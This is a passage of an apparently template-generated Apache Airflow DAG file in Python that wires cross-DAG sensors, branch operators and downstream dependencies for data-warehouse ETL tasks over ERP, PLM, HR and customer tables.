dag=D_ODS_QAM,
)
# Cross dag sensor
my_taskid = "D_ODS_QAMxD_STG_INIT__SYS_STS_STG"
D_ODS_QAMxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_ODS_QAM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_QAMxD_STG_INIT__SYS_STS_STG)
D_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_QAMxD_STG_INIT__SYS_STS_STG)
def branch_D_ODS_SCMxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG","D_ODS_SCMxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG","D_ODS_SCMxD_STG_INIT__SYS_STS_STG"]
return ["proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG"
BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_ODS_SCMxD_STG_INIT__SYS_STS_STG,
dag=D_ODS_SCM,
provide_context=True,
)
my_taskid = "proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG"
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_ODS_SCM,
)
# Cross dag sensor
my_taskid = "D_ODS_SCMxD_STG_INIT__SYS_STS_STG"
D_ODS_SCMxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=D_ODS_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG)
BRANCH_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(D_ODS_SCMxD_STG_INIT__SYS_STS_STG)
D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG)
def branch_W_ODS_QAMxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG","W_ODS_QAMxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG","W_ODS_QAMxD_STG_INIT__SYS_STS_STG"]
return ["proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_W_ODS_QAMxD_STG_INIT__SYS_STS_STG"
BRANCH_W_ODS_QAMxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_W_ODS_QAMxD_STG_INIT__SYS_STS_STG,
dag=W_ODS_QAM,
provide_context=True,
)
my_taskid = "proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG"
proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=W_ODS_QAM,
)
# Cross dag sensor
my_taskid = "W_ODS_QAMxD_STG_INIT__SYS_STS_STG"
W_ODS_QAMxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=W_ODS_QAM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_W_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG)
BRANCH_W_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(W_ODS_QAMxD_STG_INIT__SYS_STS_STG)
W_ODS_QAMxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_W_ODS_QAMxD_STG_INIT__SYS_STS_STG)
def branch_M_ODS_CUSxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG","M_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG","M_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
return ["proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_M_ODS_CUSxD_STG_INIT__SYS_STS_STG"
BRANCH_M_ODS_CUSxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_M_ODS_CUSxD_STG_INIT__SYS_STS_STG,
dag=M_ODS_CUS,
provide_context=True,
)
my_taskid = "proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG"
proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=M_ODS_CUS,
)
# Cross dag sensor
my_taskid = "M_ODS_CUSxD_STG_INIT__SYS_STS_STG"
M_ODS_CUSxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=M_ODS_CUS,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG)
BRANCH_M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(M_ODS_CUSxD_STG_INIT__SYS_STS_STG)
M_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_M_ODS_CUSxD_STG_INIT__SYS_STS_STG)
def branch_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_STG_INIT")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG","Y_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG","Y_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
return ["proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG"]
my_taskid = "BRANCH_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG"
BRANCH_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG,
dag=Y_ODS_CUS,
provide_context=True,
)
my_taskid = "proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG"
proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=Y_ODS_CUS,
)
# Cross dag sensor
my_taskid = "Y_ODS_CUSxD_STG_INIT__SYS_STS_STG"
Y_ODS_CUSxD_STG_INIT__SYS_STS_STG= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_STG_INIT",
external_task_id="SYS_STS_STG",
mode="reschedule",
dag=Y_ODS_CUS,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG)
BRANCH_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(Y_ODS_CUSxD_STG_INIT__SYS_STS_STG)
Y_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(proxy_Y_ODS_CUSxD_STG_INIT__SYS_STS_STG)
# XSLT:loop: JOB_FLOW_NAME-and-PRE_JOB: External: END}}
# XSLT:loop: JOB_FLOW_NAME: START{
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_PRD_SRC.MTL_SYSTEM_ITEMS_B
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_SYSTEM_ITEMS_B)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(FND_COLUMNS)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(FND_LOOKUP_TYPES)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(FND_LOOKUP_VALUES)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(FND_TABLES)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_CATEGORIES_B)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_CATEGORY_SETS_B)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_CUSTOMER_ITEMS)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_ITEM_CATALOG_GROUPS_B)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_ITEM_CATEGORIES)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MTL_ITEM_STATUS_TL)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(PRJ_WORKTIMEDATA)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(XXPLM_MODEL)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(XXPLM_PROJECT)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(XXPLM_TFD)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(Z_CDOCUMENT_CHECKING_RULE)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MV_XXPLM_MODEL_CHECKRULE_V)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(XXPLM_EC_CHANGE_TYPE)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(NSP_REQ_HEADERS)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(NSP_REQ_LINES)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(EFLOW_PCS_HEADER_TW)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(EFLOW_PCS_LINEEE_TW)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(EFLOW_PCS_LINEER_TW)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(EFLOW_BTMS_EXPENSEPROJECT_TW)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MV_PROJECT_ACTIVITY_V)
proxy_D_ODS_PRD_SRCxD_STG_INIT__SYS_STS_STG.set_downstream(MV_XXPLM_CFDMETADATA_V)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_SDM_PRD.SDM_PLM_CATEGORY
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(SDM_PLM_CATEGORY)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__MTL_SYSTEM_ITEMS_B.set_downstream(SDM_ITEM)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_EC_CHANGE_TYPE.set_downstream(SDM_ECN_REASON)
proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(SDM_XXPLM_EC)
SDM_XXPLM_EC.set_downstream(SDM_ECN_CASE_AFTER_MP)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(SDM_ECN_CASE_AFTER_MP)
proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(SDM_ECN_CASE_AFTER_MP)
SDM_UPLOAD_CDOC_COUNT.set_downstream(SDM_CDOC_COMPLETION_RATE)
SDM_TOTAL_CDOC_COUNT.set_downstream(SDM_CDOC_COMPLETION_RATE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__Z_CDOCUMENT_CHECKING_RULE.set_downstream(SDM_UPLOAD_CDOC_COUNT)
SDM_UPLOAD_CDOC_COUNT.set_downstream(SDM_TOTAL_CDOC_COUNT)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_PROJECT.set_downstream(SDM_PROJECT_CODE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(SDM_TOOLING_TOTAL_EXPENSE)
proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(SDM_TOOLING_TOTAL_EXPENSE)
SDM_PROJECT_CODE.set_downstream(SDM_TOOLING_TOTAL_EXPENSE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_HEADER_TW.set_downstream(SDM_DMST_AND_INTL_TRAVEL_EXP)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEEE_TW.set_downstream(SDM_DMST_AND_INTL_TRAVEL_EXP)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_PCS_LINEER_TW.set_downstream(SDM_DMST_AND_INTL_TRAVEL_EXP)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__EFLOW_BTMS_EXPENSEPROJECT_TW.set_downstream(SDM_DMST_AND_INTL_TRAVEL_EXP)
proxy_D_SDM_PRDxD_ODS_HRM__UH_RDEXPENSE.set_downstream(SDM_RD_LABOR_HOURS_EXPENSE)
SDM_CTF_EXPENSE.set_downstream(SDM_TESTING_EXPENSE)
SDM_EQT_EXPENSE.set_downstream(SDM_TESTING_EXPENSE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(SDM_CTF_EXPENSE)
proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(SDM_CTF_EXPENSE)
SDM_PROJECT_CODE.set_downstream(SDM_CTF_EXPENSE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(SDM_EQT_EXPENSE)
proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(SDM_EQT_EXPENSE)
SDM_PROJECT_CODE.set_downstream(SDM_EQT_EXPENSE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__NSP_REQ_HEADERS.set_downstream(SDM_EPR_MFG_SAMPLE_BUILD_EXP)
proxy_D_SDM_PRDxD_SDM_FIN__SDM_MANUFACTURING_PLANT.set_downstream(SDM_EPR_MFG_SAMPLE_BUILD_EXP)
SDM_PROJECT_CODE.set_downstream(SDM_EPR_MFG_SAMPLE_BUILD_EXP)
proxy_D_SDM_PRDxD_ODS_MFG_SRC__XXWIP_STOREIN_USAGE_TEMP.set_downstream(SDM_EPR_MFG_CONVERSION_COST)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(SDM_EPR_MFG_CONVERSION_COST)
proxy_D_SDM_PRDxD_SDM_SCM__SDM_ORG_HIER.set_downstream(SDM_EPR_MFG_CONVERSION_COST)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__MV_PROJECT_ACTIVITY_V.set_downstream(SDM_CDOC_PLANNED_DEV_TIME)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(SDM_CDOC_PLANNED_DEV_TIME)
SDM_CDOC_PLANNED_DEV_TIME.set_downstream(SDM_PROD_DEV_MLST_DELAY_RATE)
SDM_CDOC_DELAY_TIME.set_downstream(SDM_PROD_DEV_MLST_DELAY_RATE)
proxy_D_SDM_PRDxD_ODS_PRD_SRC__XXPLM_MODEL.set_downstream(SDM_CDOC_DELAY_TIME)
SDM_PRODUCT_EXPENSE_BUDGET.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
SDM_DMST_AND_INTL_TRAVEL_EXP.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
SDM_EPR_MFG_CONVERSION_COST.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
SDM_EPR_MFG_SAMPLE_BUILD_EXP.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
SDM_CTF_EXPENSE.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
SDM_EQT_EXPENSE.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
SDM_TOOLING_TOTAL_EXPENSE.set_downstream(SDM_PRODUCT_ACTUAL_EXPENSE)
proxy_D_SDM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(SDM_PRODUCT_EXPENSE_BUDGET)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_DM_PRD.FCT_PROD_DEV_MLST_DELAY_RATE
proxy_D_DM_PRDxD_SDM_PRD__SDM_PROD_DEV_MLST_DELAY_RATE.set_downstream(FCT_PROD_DEV_MLST_DELAY_RATE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_PLANNED_DEV_TIME.set_downstream(FCT_PROD_DEV_MLST_DELAY_RATE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_CDOC_DELAY_TIME.set_downstream(FCT_PROD_DEV_MLST_DELAY_RATE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_CASE_AFTER_MP.set_downstream(FCT_ECN_CASE_AFTER_MP)
proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_CONVERSION_COST.set_downstream(FCT_EPR_MFG_CONVERSION_COST)
proxy_D_DM_PRDxD_SDM_PRD__SDM_TOOLING_TOTAL_EXPENSE.set_downstream(FCT_TOOLING_TOTAL_EXPENSE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_DMST_AND_INTL_TRAVEL_EXP.set_downstream(FCT_DMST_AND_INTL_TRAVEL_EXP)
proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(FCT_RD_LABOR_HOURS_EXPENSE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_TESTING_EXPENSE.set_downstream(FCT_TESTING_EXPENSE)
proxy_D_DM_PRDxD_STG_INIT__SYS_STS_STG.set_downstream(FCT_TESTING_EXPENSE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_EQT_EXPENSE.set_downstream(FCT_TESTING_EXPENSE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_EPR_MFG_SAMPLE_BUILD_EXP.set_downstream(FCT_TESTING_EXPENSE)
proxy_D_DM_PRDxD_SDM_PRD__SDM_ITEM.set_downstream(DIM_ITEM)
proxy_D_DM_PRDxD_SDM_PRD__SDM_PLM_CATEGORY.set_downstream(DIM_PLM_CATEGORY)
proxy_D_DM_PRDxD_SDM_PRD__SDM_ECN_REASON.set_downstream(DIM_ECN_REASON)
proxy_D_DM_PRDxD_SDM_PRD__SDM_PROJECT_CODE.set_downstream(DIM_PROJECT_CODE)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_CUS.ODS_UC_Tier1_OEM_Mapping_Table_WH
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Tier1_OEM_Mapping_Table_WH)
ODS_UC_Tier1_OEM_Mapping_Table_WH.set_downstream(UC_Tier1_OEM_Mapping_Table_STG)
UC_Tier1_OEM_Mapping_Table_STG.set_downstream(ODS_UC_Tier1_OEM_Mapping_Table_LD)
ODS_UC_Tier1_OEM_Mapping_Table_LD.set_downstream(UC_Tier1_OEM_Mapping_Table)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Customer_Model_Name_WH)
ODS_UC_Customer_Model_Name_WH.set_downstream(UC_Customer_Model_Name_STG)
UC_Customer_Model_Name_STG.set_downstream(ODS_UC_Customer_Model_Name_LD)
ODS_UC_Customer_Model_Name_LD.set_downstream(UC_Customer_Model_Name)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Pre_Project_information_WH)
ODS_UC_Pre_Project_information_WH.set_downstream(UC_Pre_Project_information_STG)
UC_Pre_Project_information_STG.set_downstream(ODS_UC_Pre_Project_information_LD)
ODS_UC_Pre_Project_information_LD.set_downstream(UC_Pre_Project_information)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Premium_Freight_WH)
ODS_UC_Premium_Freight_WH.set_downstream(UC_Premium_Freight_STG)
UC_Premium_Freight_STG.set_downstream(ODS_UC_Premium_Freight_LD)
ODS_UC_Premium_Freight_LD.set_downstream(UC_Premium_Freight)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_RFQ_Freight_Estimate_MAP_WH)
ODS_UC_RFQ_Freight_Estimate_MAP_WH.set_downstream(UC_RFQ_Freight_Estimate_MAP_STG)
UC_RFQ_Freight_Estimate_MAP_STG.set_downstream(ODS_UC_RFQ_Freight_Estimate_MAP_LD)
ODS_UC_RFQ_Freight_Estimate_MAP_LD.set_downstream(UC_RFQ_Freight_Estimate_MAP)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_RFQ_Critical_Parts_MAP_WH)
ODS_UC_RFQ_Critical_Parts_MAP_WH.set_downstream(UC_RFQ_Critical_Parts_MAP_STG)
UC_RFQ_Critical_Parts_MAP_STG.set_downstream(ODS_UC_RFQ_Critical_Parts_MAP_LD)
ODS_UC_RFQ_Critical_Parts_MAP_LD.set_downstream(UC_RFQ_Critical_Parts_MAP)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_RFQ_Key_parts_MAP_WH)
ODS_UC_RFQ_Key_parts_MAP_WH.set_downstream(UC_RFQ_Key_parts_MAP_STG)
UC_RFQ_Key_parts_MAP_STG.set_downstream(ODS_UC_RFQ_Key_parts_MAP_LD)
ODS_UC_RFQ_Key_parts_MAP_LD.set_downstream(UC_RFQ_Key_parts_MAP)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Company_and_Background_Check_WH)
ODS_UC_Company_and_Background_Check_WH.set_downstream(UC_Company_and_Background_Check_STG)
UC_Company_and_Background_Check_STG.set_downstream(ODS_UC_Company_and_Background_Check_LD)
ODS_UC_Company_and_Background_Check_LD.set_downstream(UC_Company_and_Background_Check)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Customer_PO_Management_WH)
ODS_UC_Customer_PO_Management_WH.set_downstream(UC_Customer_PO_Management_STG)
UC_Customer_PO_Management_STG.set_downstream(ODS_UC_Customer_PO_Management_LD)
ODS_UC_Customer_PO_Management_LD.set_downstream(UC_Customer_PO_Management)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_NC_Customer_Rebate_PN_WH)
ODS_UC_NC_Customer_Rebate_PN_WH.set_downstream(UC_NC_Customer_Rebate_PN_STG)
UC_NC_Customer_Rebate_PN_STG.set_downstream(ODS_UC_NC_Customer_Rebate_PN_LD)
ODS_UC_NC_Customer_Rebate_PN_LD.set_downstream(UC_NC_Customer_Rebate_PN)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_Risk_Shipment_Weekly_WH)
ODS_UC_Risk_Shipment_Weekly_WH.set_downstream(UC_Risk_Shipment_Weekly_STG)
UC_Risk_Shipment_Weekly_STG.set_downstream(ODS_UC_Risk_Shipment_Weekly_LD)
ODS_UC_Risk_Shipment_Weekly_LD.set_downstream(UC_Risk_Shipment_Weekly)
proxy_D_ODS_CUSxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UC_NC_ROYALTY_REPORT_WH)
ODS_UC_NC_ROYALTY_REPORT_WH.set_downstream(UC_NC_ROYALTY_REPORT_STG)
UC_NC_ROYALTY_REPORT_STG.set_downstream(ODS_UC_NC_ROYALTY_REPORT_LD)
ODS_UC_NC_ROYALTY_REPORT_LD.set_downstream(UC_NC_ROYALTY_REPORT)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_GBD.ODS_UG_PIPELINE_PROJECT_CONVERSION_WH
proxy_D_ODS_GBDxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UG_PIPELINE_PROJECT_CONVERSION_WH)
ODS_UG_PIPELINE_PROJECT_CONVERSION_WH.set_downstream(UG_PIPELINE_PROJECT_CONVERSION_STG)
UG_PIPELINE_PROJECT_CONVERSION_STG.set_downstream(ODS_UG_PIPELINE_PROJECT_CONVERSION_LD)
ODS_UG_PIPELINE_PROJECT_CONVERSION_LD.set_downstream(UG_PIPELINE_PROJECT_CONVERSION)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_HRM.ODS_UH_SENIORITY_WH
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_SENIORITY_WH)
ODS_UH_SENIORITY_WH.set_downstream(UH_SENIORITY_STG)
UH_SENIORITY_STG.set_downstream(ODS_UH_SENIORITY_LD)
ODS_UH_SENIORITY_LD.set_downstream(UH_SENIORITY)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_HEADCOUNT_BUDGET_WH)
ODS_UH_HEADCOUNT_BUDGET_WH.set_downstream(UH_HEADCOUNT_BUDGET_STG)
UH_HEADCOUNT_BUDGET_STG.set_downstream(ODS_UH_HEADCOUNT_BUDGET_LD)
ODS_UH_HEADCOUNT_BUDGET_LD.set_downstream(UH_HEADCOUNT_BUDGET)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_RDEXPENSE_WH)
ODS_UH_RDEXPENSE_WH.set_downstream(UH_RDEXPENSE_STG)
UH_RDEXPENSE_STG.set_downstream(ODS_UH_RDEXPENSE_LD)
ODS_UH_RDEXPENSE_LD.set_downstream(UH_RDEXPENSE)
proxy_D_ODS_HRMxD_STG_INIT__SYS_STS_STG.set_downstream(ODS_UH_WORKPLACE_MAPPING_WH)
ODS_UH_WORKPLACE_MAPPING_WH.set_downstream(UH_WORKPLACE_MAPPING_STG)
